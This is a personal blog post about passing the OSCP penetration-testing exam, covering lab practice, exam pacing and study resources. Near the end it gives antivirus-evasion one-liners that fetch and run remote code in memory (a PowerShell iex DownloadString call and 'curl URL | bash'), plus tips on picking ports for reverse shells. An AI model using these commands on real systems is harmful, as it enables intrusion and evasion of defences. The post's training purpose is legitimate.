Hi everyone, today I’m going to tell you my story on how I was able to root all 5 machines in my OSCP Exam and earned 100 points in just 10 hours! Hope you can get something from here that might be useful for you in your journey!
It wasn't easy but not hard at all, the only right way to describe the journey is the word “Exciting”. To give a better understanding, I am a Computer Science graduate with a Cyber Security Major. I have been involved in cyber defense technology research for the past 2 years.
I have a very good understanding of python, c, and bash. These three things played a major success in my blue-team-related thesis about using machine learning to create a fully autonomous web application firewall. If you’re interested in one of our research about remote code execution, you can read it here
1st July 2021 is the start of the journey. My company enrolled me in a 60days PWK Course starting from 11 July 2021. In my case, they did clear my schedule to the point where it feels like a paid leave 😂😂. The only thing I need to do is hack hack and hack!
The first 10 days, while waiting for the PWK Labs, I decided to practice in Hackthebox Lab. I followed Tjnull’s OSCP like box and only did the Linux boxes. I plan to make myself familiar with Linux exploitation before the PWK Lab start, then I can focus on Windows Exploitation and Buffer Overflow later on.
I know about “Try Harder” but I just can’t click with this methodology when we are in the learning phase. I mean, you don't know what you don't know. When you are stuck with an exploit and don’t know how to get things to work, there are two possibilities that you can do:
- You keep trying the same exploit over and over again with an angry face and revert the machine over and over again. Smashing your keyboard in the process :)
- You reach out to the community/forum/ippsec video or official writeup to understand how the exploit work, why the service is exploitable, how doest the exploit takes place and you understand the flow.
I solved all of PWK labs and Tjnull’s list boxes and I do realize that sometimes we need to use a specific exploit with a very limited resource even in google. You need help, at least a sanity check, or a good keyword to keep you on the right track.
My methodology is simple, when I encounter a new service that I’m not familiar with and already spent too much time trying to get the exploit to work without any success, I will simply visit the forum without any hesitation. Then I make sure that I take good notes so that if I encounter the same service in the future, I can easily apply what I just learn. Pivoting and tunneling can be tricky too! Remember that “You learn something new every day.”
The PWK Lab
This might be the most exciting moment in my life. It feels like heaven when I can finally express my curiosity in 75 different live targets. As I said before, I have already done Tjnull’s boxes and the lab is surprisingly indeed similar to those boxes, the only noticeable difference is that the HTB box got a CTF-feels-like touch and the PWK Lab is feels like a straightforward real-life-scenario.
In my first week, I was able to root a total of 29 boxes🔥🔥. And the second week I was able to add another 23 to a total of 52 boxes in 2 weeks🔥🔥. My priority is to attack the active directory and dependent machines and skip the hard machines. Slowly but surely I can feel the fire inside me will light out soon.
At this point, it feels almost impossible to keep on going on. I was stuck in two opposite feelings. First, I feel like I was repeating the same things over and over again. And it feels like the remaining boxes are very hard and almost impossible to solve.
To deal with this, I decide to take a week-long vacation. I went out with my family, play dota with my friend, stay up all night playing cyberpunk (with netrunner / hacker build for sure!) for the whole week. Whenever I felt guilty for myself, I would watch ippsec videos and keep on my notes going.
If you are in this period, to move forward you just need to constantly ask yourself
How bad you want it?
In my fourth week, it's enough playing and time to come back for the grind. While doing the ex-exam machine in one of the depts, I have trouble understanding static binary and pivoting. Lucky for me I found myself a friend from offsec community discord that teaches me the right way to pivot and the power of Nishang Reverse Shell.
The Buffer overflow was a bit hard for me, luckily the offsec gave a very clear video explaining step by step how the exploit occurs, so I understand the whole flow of the exploit. After reproducing the win 32 BOF exercises, the BOF machine in the lab was too easy.
In the first month of my lab time, I was able to completely pwned all the boxes in the PWK lab! I felt very happy but also worried about Windows Privilege Escalation as I am not too familiar with windows env (I am a mac user).
After I have done all the boxes, I’m didn't touch any lab anymore. Every day for the next 2 weeks I just played Dota and watch ippsec videos. Every time I learn something new, I will add it to my notes.
In this period, I found https://ippsec.rocks/ and it is very useful in my exam. I booked for the 6th of September and later rescheduled it to the 3rd of September.
The Important Points in PWK Lab
If you want to have a good exam experience, I strongly suggest considering all things on this list:
- Make sure you solve the big 4 boxes in the lab without any help. No need to rush, just do these boxes whenever you feel ready. These boxes will give you lots of new knowledge.
- Make sure you rooted every retired exam boxes. You will know when you see one. These boxes are very different from the lab boxes. You will know why and it will make you know what to expect in the real exam.
- Make sure you master your tools. What did you choose? NmapAutomator? AutoRecon? Manual Nmap? Make sure to have familiarity with the result. Try your tools to the retired exam boxes.
- Make sure to master your reverse shell and understand how to choose the right port. Exam machine is very tricky and sensitive to port incoming-outgoing rules. Try to test your methodology in the retired exam boxes.
- For what is worth, don’t focus on your public dept as it will only provide you with the basic skills you need. Break into another department, learn how to pivot, and have fun with the real boxes!
The OSCP Exam
My exam starts at 10.00 AM. I woke up at around 9.30 AM and was kinda surprised when I go to my discord channel and see that all my friends are waiting for me. I have 3 best friends there, one is an IT GRC Officer, one is Risk Consultant, and one is a colleague. They sent me coffee, give me motivation, and were always there for the next 10 hours. Whenever I take a break, I would join the discord channel and talk about how we going to play Dota and Age Of Empire III hard after I passed my exam🙃🙃
This was the first time that someone took the OSCP exam in my class and everyone was very excited even though they are not into offensive security at all 🙃🙃
15 minutes before the exam started, I left the discord channels and proceed to the verification process. Everything went well and I got my VPN access exactly at 10.00 AM
The plan is simple.
- Win32 Buffer Overflow (25 Points)
- Easy Box (10 Points)
- Medium Box (20 Points)
- Medium Box (20 Points) — Safe Point
- Hard box ( 25 Points)
I use NmapAutomator for the 25 points box to save time. Then I start with my plan.
Well, the unexpected was going two ways. The first is “Wow this is too easy” and the second is “The hell is this?”. The first is for buffer overflow, after spending around a week learning about buffer overflow methodology, It was a relief when I solved the Buffer Overflow box in just 30 minutes.
I took a break for 30 minutes after being done with Buffer Overflow while waiting for the Nmap to run. Ordered Gojek to deliver me some coffee, shihlin, candy, and lunch. I was very excited!!
The next is the 10 points and 20 point box. These two boxes teach me about “Expect the Unexpected” and “Try Harder” methodology 🙃🙃 I keep on making small mistakes by underestimating an exploit and choosing random port without any reason. After I applied things that I learned from the retired exam boxes in the lab, I was able to complete these boxes in just two hours.
The boxes are relatively easy but need lots of effort. Debugging, fixing, and downloading new services that I’m not very familiar with to get a better understanding is the way to understand the flow and flaw.
I took a one-hour break to go out with my little sister and pick up some ice cream at McD. Don't forget to relax, you’re free to take as many breaks as you want as long as you ask the proctor politely. Then I started my next box.
I have two mottos to keep me in line with the exploit and sanity check the progress. If it’s too hard I would ask my self “OSCP is a Foundation course, would it be this far?” and if it looks too easy and straightforward and the exploit didn't work, I would ask my self “If it is this easy, why the OSCP pass rate is really low? There must be another way”.
The next two boxes are relatively exciting. As far as I remember, I didn’t use any public exploit to gain shell at all! Purely chaining misconfiguration and taking advantage of open services! This box is very fun and represents a real-life scenario. In around two and a half hours I’ve managed to get root on the 20 points box and low-level shell in the 25 point box. I already got 87.5 Points in my pocket and feel safe.
I decide to take another one-hour break, I contacted my colleagues to inform them that I’ve got 4 roots and 1 low-level shell. They were very excited and congratulate me. My friends in discord were very happy and they sent me some food. I use this time to take a bath and relax.
The last privilege escalate took me 2 hours in total. It was very exciting to finally able to use my Web Exploit skill in this advanced CTF-like case. Chaining some vulnerabilities and services, I’ve managed to get a windows admin account as a web shell. I jumped out of my brand-new secret lab chair. My dad is next to me and hugged me when I said “I got 100 points”. I then chat the proctored to say “Heyy, just want to let you know I got 100 points :) I am very happy”. As expected he doesn't care and reply “Keep up the good work” 🙃🙃.
Even though it was a web shell, I master nishang as my secret weapon and know how to upgrade this shell to a fully interactive one. So I decided to take another 15 minutes short break to let my friends and colleagues know that I got 100 points! I WAS VERY HAPPY!
After the break, I upgraded the web shell to a qualified reverse shell, It was very easy when I already use nishang in all my windows boxes. In exactly 10 hours. I rooted 5 machines and got 100points! It took me another one hour to reproduce all the exploits and took screenshots for reporting. I stop my exam afterward.
I played Dota all night and start reporting the next day. Around 7 hours after my submission, I got an email from the offensive security team that I passed my OSCP Exam!
These are the resource that helps me a lot in my lab and exam.
- Got a RCE in Windows Based system? Nishang Windows Reverse Shell
- Already got low-level shell? Linpeas/Winpeas to enumerate and pspy to guess the cronjob.
- Don’t know how to exploit specific services? Ippsec.rock
- Don’t know about common website and service exploit? hacktrics
- No service is exploitable? Try kernel exploit Linux Exploit Suggester 2 and Metasploit’s Local Exploit Suggester for Windows.
Antivirus Evasion Technique
In the lab and exam, you will encounter lots of machines with built-in antivirus. Whenever you tried to download a reverse shell/backdoor payload like nishang or msfvenom generated venom, the files will instantly be removed from the server, you can take advantage of in-memory download and execute as shown below.
For Windows, you can use :
powershell iex (New-Object Net.WebClient).DownloadString(‘url’)
And for Linux, you can take advantage of the command chaining operation, in this case, pipe to directly point the raw files to bash
curl URL | bash
Port Choosing Technique
Make sure you understand a way to determine which port to use. Obviously, if you force a windows server to download files from a random port, the firewall will block it right away. Aim for common misconfiguration to be taking advantage of. For example, if you want to transfer a file, make sure to host it in 80 or 443. And if you want to make a reverse connection, try port 22. If no port is working, try to aim for port reuse by killing the application in the low-level shell.
I will update this section when I remember another resource I used.
I am forever thankful to be part of the Vantage Point Security team. All my colleagues are very humble and supportive. I am thankful for my supportive family and friends as well.
Thanks to my friends for the constant support and time invested in me: Christoval Leaved, Yerriell K Hidayat, Verdi Vajira, and Pulkit Talwar.